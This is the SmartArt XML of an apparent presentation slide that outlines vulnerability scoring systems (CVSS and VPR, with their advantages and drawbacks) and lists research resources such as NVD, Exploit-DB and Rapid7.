    <dgm:cxn modelId="{C1446C2C-9E27-4FC8-8885-D9A3A504E520}" type="presOf" srcId="{80FF5AEC-6AB4-46E6-92B2-E08B0832A863}" destId="{23E0191F-8FBF-4239-A8FA-9F4CD2D68705}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{41F88430-77D8-434F-BF66-67D481BBF62B}" srcId="{A971627A-9D07-4A86-B6CA-2A569AE8943B}" destId="{F2C5C1E2-2809-4C4E-8261-DB01A73920BF}" srcOrd="3" destOrd="0" parTransId="{0861AAEB-EE80-4274-AADD-BB77C1EB9A3A}" sibTransId="{FB6940B7-2E53-4CF8-886C-20E1AA3839EE}"/>
    <dgm:cxn modelId="{9B77F056-219B-40BA-B841-769E32297B24}" type="presOf" srcId="{F2C5C1E2-2809-4C4E-8261-DB01A73920BF}" destId="{5357FABA-4393-4E78-AC84-092FA64D5A16}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{D4940C77-EAF9-4170-999D-054283726601}" type="presOf" srcId="{A971627A-9D07-4A86-B6CA-2A569AE8943B}" destId="{3362D2C6-64F5-4516-8814-D8690869B54B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{CAEC749D-0656-4267-93D5-0993E6409122}" type="presOf" srcId="{BA8BD76D-8624-42AA-AD96-B6ECBCBD6A68}" destId="{076400EC-2719-40EB-94E6-DB42C7CE8C38}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{564D6EA2-99D1-412B-BE6E-9C82BCE3C4F5}" srcId="{A971627A-9D07-4A86-B6CA-2A569AE8943B}" destId="{80FF5AEC-6AB4-46E6-92B2-E08B0832A863}" srcOrd="0" destOrd="0" parTransId="{A0CF5661-B9ED-4938-B184-0E7B77BE5C78}" sibTransId="{50EC5754-12EA-419A-A647-0DDDB4CBDA8D}"/>
    <dgm:cxn modelId="{B3E2D8B8-A35D-4230-84DB-C24FE57141B0}" srcId="{A971627A-9D07-4A86-B6CA-2A569AE8943B}" destId="{2B0286D9-1EB0-4DA2-BAD7-5541ED2F490A}" srcOrd="2" destOrd="0" parTransId="{368CC7D7-0050-4850-8874-C312A241B8E0}" sibTransId="{0087A09B-9C93-44FC-83C5-DE83F12FCCDA}"/>
    <dgm:cxn modelId="{02D5CEBB-EFFA-412F-AFF6-0D14447EC558}" type="presOf" srcId="{2B0286D9-1EB0-4DA2-BAD7-5541ED2F490A}" destId="{E2A52A9B-CCC7-496B-8D6B-8B0EAA4B3AD7}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{49840CBD-A5E0-4CE3-B7E2-35A3E3646D44}" srcId="{A971627A-9D07-4A86-B6CA-2A569AE8943B}" destId="{DB1E2A72-5574-48AF-98BA-142C771AE0E0}" srcOrd="1" destOrd="0" parTransId="{861079B8-8F40-49E0-82C9-D8F18A352F46}" sibTransId="{641A9597-63D7-41C8-8A4D-8944861B1C07}"/>
    <dgm:cxn modelId="{DA471BE0-98F5-4DDA-98CA-F665AFB7F515}" srcId="{A971627A-9D07-4A86-B6CA-2A569AE8943B}" destId="{BA8BD76D-8624-42AA-AD96-B6ECBCBD6A68}" srcOrd="4" destOrd="0" parTransId="{7D68B5ED-1FCD-4B55-A901-2353028A007D}" sibTransId="{F2812C36-BA53-47C8-AFCA-17A7EBCD664D}"/>
    <dgm:cxn modelId="{CA230CF5-2250-4808-A673-AF77399F4808}" type="presOf" srcId="{DB1E2A72-5574-48AF-98BA-142C771AE0E0}" destId="{ACC1F707-86AA-48F1-AA87-5B77320F775C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{D1FB0202-D65A-4F6E-A3C4-62700B45CC3C}" type="presParOf" srcId="{3362D2C6-64F5-4516-8814-D8690869B54B}" destId="{FB08C557-061F-47CB-AE7B-E30FC4F06B99}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{844373C9-5DCF-493E-9AF1-497936083295}" type="presParOf" srcId="{FB08C557-061F-47CB-AE7B-E30FC4F06B99}" destId="{39D6F6EC-D4B4-4EE3-9832-4387E440CBD6}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{97F1CAB4-C5EF-4EB3-958F-D6F88474CA7F}" type="presParOf" srcId="{FB08C557-061F-47CB-AE7B-E30FC4F06B99}" destId="{85501616-B0C4-415D-B7AF-29F864105B68}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{FCA3FF6D-A011-41CC-97B6-94756F976E60}" type="presParOf" srcId="{FB08C557-061F-47CB-AE7B-E30FC4F06B99}" destId="{25F6E171-D8C6-45BF-B665-B27C67F421AE}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{B7C36B60-8AB7-4747-A58B-4DCE71595A55}" type="presParOf" srcId="{FB08C557-061F-47CB-AE7B-E30FC4F06B99}" destId="{23E0191F-8FBF-4239-A8FA-9F4CD2D68705}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{1A9C720E-93EE-4EB4-B7A5-6F9C7EEBFBCB}" type="presParOf" srcId="{3362D2C6-64F5-4516-8814-D8690869B54B}" destId="{AD950571-E2DA-410A-87D7-47609D624403}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{A76E95FD-F5F1-4024-9B75-0F93674CA2C2}" type="presParOf" srcId="{3362D2C6-64F5-4516-8814-D8690869B54B}" destId="{2BA3320C-ACCE-4B00-A74E-4AE4D1528BC3}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{13E4AC6F-9493-4617-85FE-F2BADF645837}" type="presParOf" srcId="{2BA3320C-ACCE-4B00-A74E-4AE4D1528BC3}" destId="{BC8816F6-C443-4C38-8B2D-1A4C58BA2F4E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{17CDC03C-E8A5-41B9-82A8-3CDCBF8CB04B}" type="presParOf" srcId="{2BA3320C-ACCE-4B00-A74E-4AE4D1528BC3}" destId="{2D574396-6D6D-46A2-85D0-BD58C82E8386}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{8DCCED26-7B2E-4FD6-8FF1-A78753CE8CD8}" type="presParOf" srcId="{2BA3320C-ACCE-4B00-A74E-4AE4D1528BC3}" destId="{975FD4A7-37F2-41BC-82BC-38BB6DDD2658}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{3B962E46-6DB9-4303-B009-C14945F0E8D0}" type="presParOf" srcId="{2BA3320C-ACCE-4B00-A74E-4AE4D1528BC3}" destId="{ACC1F707-86AA-48F1-AA87-5B77320F775C}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{6D46CD4E-3B8B-49A1-B893-F2A35AA17487}" type="presParOf" srcId="{3362D2C6-64F5-4516-8814-D8690869B54B}" destId="{C1F579D9-CE9E-4685-8817-D7DE50210E2F}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{5F894823-BC91-4E4C-9451-016D685B96A7}" type="presParOf" srcId="{3362D2C6-64F5-4516-8814-D8690869B54B}" destId="{5ACE4098-ADBE-4413-A4CB-75AE7EF4CA79}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{0B11B1E7-CD49-431B-B74E-E442DC81B987}" type="presParOf" srcId="{5ACE4098-ADBE-4413-A4CB-75AE7EF4CA79}" destId="{C0041D5B-A451-4BE7-97ED-ECB827100573}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{3CD90F92-17B7-4A79-B4EA-4A4E1DC74FC2}" type="presParOf" srcId="{5ACE4098-ADBE-4413-A4CB-75AE7EF4CA79}" destId="{806E1EAD-6482-4F32-BDAB-A2E0D9356CFF}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{63FCB9FB-9F73-4EB2-8CAE-B4D27136E7F4}" type="presParOf" srcId="{5ACE4098-ADBE-4413-A4CB-75AE7EF4CA79}" destId="{7476AFEB-422B-448D-A308-AB0E53A61139}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{BC3AAAE1-7D8B-48C8-AE53-A8907AE5A8EF}" type="presParOf" srcId="{5ACE4098-ADBE-4413-A4CB-75AE7EF4CA79}" destId="{E2A52A9B-CCC7-496B-8D6B-8B0EAA4B3AD7}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{1B23C3CB-E862-460D-AEDD-B86C2B1456F6}" type="presParOf" srcId="{3362D2C6-64F5-4516-8814-D8690869B54B}" destId="{C4F6C7D1-3FCA-4646-9D25-3B437FCE4E80}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{3E20979E-44C6-41D0-BA94-02BA23A00A67}" type="presParOf" srcId="{3362D2C6-64F5-4516-8814-D8690869B54B}" destId="{DFCC0951-D3C7-458E-B719-F674F12A1D55}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{24F090E2-5D84-4FB5-B9FC-D61EC5022FFC}" type="presParOf" srcId="{DFCC0951-D3C7-458E-B719-F674F12A1D55}" destId="{8429B3F8-0692-4580-AAAD-ACB10A105C3E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{16177ACC-5221-4563-8663-6800AEC2E77E}" type="presParOf" srcId="{DFCC0951-D3C7-458E-B719-F674F12A1D55}" destId="{3C71A647-2598-4220-851B-58FCDFB51709}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{D172F341-D5FD-4D5D-8008-3356C89DE4AE}" type="presParOf" srcId="{DFCC0951-D3C7-458E-B719-F674F12A1D55}" destId="{485A1B60-0833-486A-99F5-66F4C5D15065}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{41A65948-7728-4C6A-976C-55DC288C28F1}" type="presParOf" srcId="{DFCC0951-D3C7-458E-B719-F674F12A1D55}" destId="{5357FABA-4393-4E78-AC84-092FA64D5A16}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{107D9FB3-B24C-44A3-9BE1-25F400C97B08}" type="presParOf" srcId="{3362D2C6-64F5-4516-8814-D8690869B54B}" destId="{AFCCD979-5D27-42A9-8D82-2DB128037B34}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{9FEE4000-BECE-40D6-8F74-C626F70B6DEA}" type="presParOf" srcId="{3362D2C6-64F5-4516-8814-D8690869B54B}" destId="{EB44108E-61D4-4B24-B07D-F049B5B6A53E}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{C31FB787-0CF6-4041-98BC-458ECF47B9F6}" type="presParOf" srcId="{EB44108E-61D4-4B24-B07D-F049B5B6A53E}" destId="{92C6FA6F-4A29-442D-B552-CD287699C562}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{13BF6657-B291-438D-9CD6-D273A7902239}" type="presParOf" srcId="{EB44108E-61D4-4B24-B07D-F049B5B6A53E}" destId="{60CD19B2-7CF6-41F0-BDCF-8B3E74F85A38}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{575886D5-8D64-47EC-BB4C-349BE8F4F6EF}" type="presParOf" srcId="{EB44108E-61D4-4B24-B07D-F049B5B6A53E}" destId="{91E45695-7B91-4C88-9E60-B06D9A981D3B}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{8938DB22-275F-4F09-B3F9-D04C41B2F173}" type="presParOf" srcId="{EB44108E-61D4-4B24-B07D-F049B5B6A53E}" destId="{076400EC-2719-40EB-94E6-DB42C7CE8C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CABFEE-A6E7-4C79-B243-3FDE73D096E9}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/default" loCatId="list" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/simple5" qsCatId="simple" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/accent5_2" csCatId="accent5"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{90758AD1-037B-474C-89A6-53EDE0858175}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
            <a:t>Common Vulnerability Scoring System (CVSS)</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FEAA2E06-3747-445E-A5E9-B1B8B5515AE0}" type="parTrans" cxnId="{FFD78057-1031-43E7-9582-7F75B148B087}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1871F033-38D9-4D64-8BF4-726B16026788}" type="sibTrans" cxnId="{FFD78057-1031-43E7-9582-7F75B148B087}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{382515D6-C04A-41D5-A662-FA1DEAA72D79}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1200" dirty="0"/>
            <a:t>Scores vulnerabilities based on factors like exploitability, impact, and availability.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{012BC8CF-8AFA-44AD-9DA0-FADE9CAE725C}" type="parTrans" cxnId="{B6FDEAD1-C279-4986-AB57-62CCF1F3B0D7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{58F38959-B764-4557-BE6C-2A4EAEDCFDE8}" type="sibTrans" cxnId="{B6FDEAD1-C279-4986-AB57-62CCF1F3B0D7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{354768C2-EE63-4475-B73A-5CD9F0B96F74}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1200"/>
            <a:t>Scores range from 0 (None) to 10 (Critical).</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0124DFA5-5037-4E7B-867F-9A91DAD83BFC}" type="parTrans" cxnId="{89A16D80-7561-4D47-875E-6D15160792B8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CDA87040-3BCC-43D2-BCFE-5EAC88D178D6}" type="sibTrans" cxnId="{89A16D80-7561-4D47-875E-6D15160792B8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4D86A241-97FF-4773-9ECF-5D5C82E261CE}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1200" b="1"/>
            <a:t>Advantages</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1200"/>
            <a:t>: Long-standing, popular, free.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8B1F6FDE-5E13-45D3-8BE3-06325A259D7E}" type="parTrans" cxnId="{A458627B-D871-43D8-BCA3-40DB5B99E427}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8E5596A8-8044-47B9-A318-D8505A837C88}" type="sibTrans" cxnId="{A458627B-D871-43D8-BCA3-40DB5B99E427}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9979B333-458E-4B4E-AF07-6A8C240BCE71}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
            <a:t>Disadvantages</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1200" dirty="0"/>
            <a:t>: Not designed for prioritization, often static scores.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1E8F4250-AB94-4911-A1B4-249291DFCEA0}" type="parTrans" cxnId="{BF577922-9919-4966-853B-53706EB87745}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9DC497B7-BCCD-4B87-B348-3934D4F1AA6B}" type="sibTrans" cxnId="{BF577922-9919-4966-853B-53706EB87745}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{30C4173E-73EA-47B5-B368-3C3D7ECB800F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1"/>
            <a:t>Vulnerability Priority Rating (VPR)</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F56C6B83-8A16-4072-BE89-BD416E066BDB}" type="parTrans" cxnId="{C42A078B-0C72-4709-8A0A-4D7AB75FC8D3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{59A9220E-0EB0-4E51-B39D-C33D25AA62F8}" type="sibTrans" cxnId="{C42A078B-0C72-4709-8A0A-4D7AB75FC8D3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E8ADE5CF-20AF-4A02-9CBB-31C5E232AF08}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Focuses on the real-world risk a vulnerability poses to the specific organization.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{412DB805-2892-4D6A-99ED-7FDFAC275F6A}" type="parTrans" cxnId="{5528FE29-B0F6-4B21-BD49-BEE9CF6B20D3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7AF74C24-33E4-40ED-BBE0-8C63223A46F7}" type="sibTrans" cxnId="{5528FE29-B0F6-4B21-BD49-BEE9CF6B20D3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2D017B98-E9FE-4D72-87C9-A93354B5E0F6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1"/>
            <a:t>Advantages</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>: Modern, risk-driven, dynamic scores.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2D0AC334-3596-4FAA-ACE0-D5C215D002E1}" type="parTrans" cxnId="{47BB025C-E4A5-4A22-AA66-AE21A80EA009}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9FD2F8BC-6E2A-469A-9C51-4E18570EB13D}" type="sibTrans" cxnId="{47BB025C-E4A5-4A22-AA66-AE21A80EA009}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F6B3CE81-98CE-4183-9D53-17DC175FF69B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1"/>
            <a:t>Disadvantages</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>: Not open-source, commercial platform required.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{537D8FCE-E00B-45E0-AFF6-0CF1FAE5F6E8}" type="parTrans" cxnId="{02B3713C-840C-45D1-8F69-86B2500CAE64}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{94C09812-0595-4E05-937A-9B356B94DF8C}" type="sibTrans" cxnId="{02B3713C-840C-45D1-8F69-86B2500CAE64}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6F8D6BEA-2F05-4B48-AB40-C4C15A783145}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1"/>
            <a:t>Vulnerability Research Resources</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{93A18ECA-9804-4E13-8750-4AF7B1DAE5E7}" type="parTrans" cxnId="{AA398813-72D4-41E6-A775-2DAA48F56462}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{22655585-66F0-4D85-94A3-94CEFCE63B19}" type="sibTrans" cxnId="{AA398813-72D4-41E6-A775-2DAA48F56462}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{805C2808-20AF-40A9-BBB6-44E200E65079}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1"/>
            <a:t>NVD (National Vulnerability Database)</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>: A comprehensive list of all public vulnerabilities (CVEs).</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{88FDCC9B-6863-48A0-8CA8-8A7E095755F5}" type="parTrans" cxnId="{B8A79C73-B904-4AB8-9444-B76223075442}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FED8CBBB-200F-4AAA-B8C6-87BEE6778C65}" type="sibTrans" cxnId="{B8A79C73-B904-4AB8-9444-B76223075442}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{42C2919B-50EC-460D-B3B1-EEB7ADC655BE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1"/>
            <a:t>Exploit-DB</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>: A repository of exploits for specific applications and software versions.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1EA13C01-4E6F-485C-889B-0DC08E153131}" type="parTrans" cxnId="{6AE54BE6-15F3-44E4-8CE5-F3F8E0F99852}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CCDB8045-7FDC-4FE2-85D0-AA8761B95853}" type="sibTrans" cxnId="{6AE54BE6-15F3-44E4-8CE5-F3F8E0F99852}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A58B9BC7-EBA8-4761-A654-2D392D673B56}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1"/>
            <a:t>Rapid7</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>: Another database that combines vulnerability information with exploit instructions for Metasploit.</a:t>
          </a:r>
        </a:p>
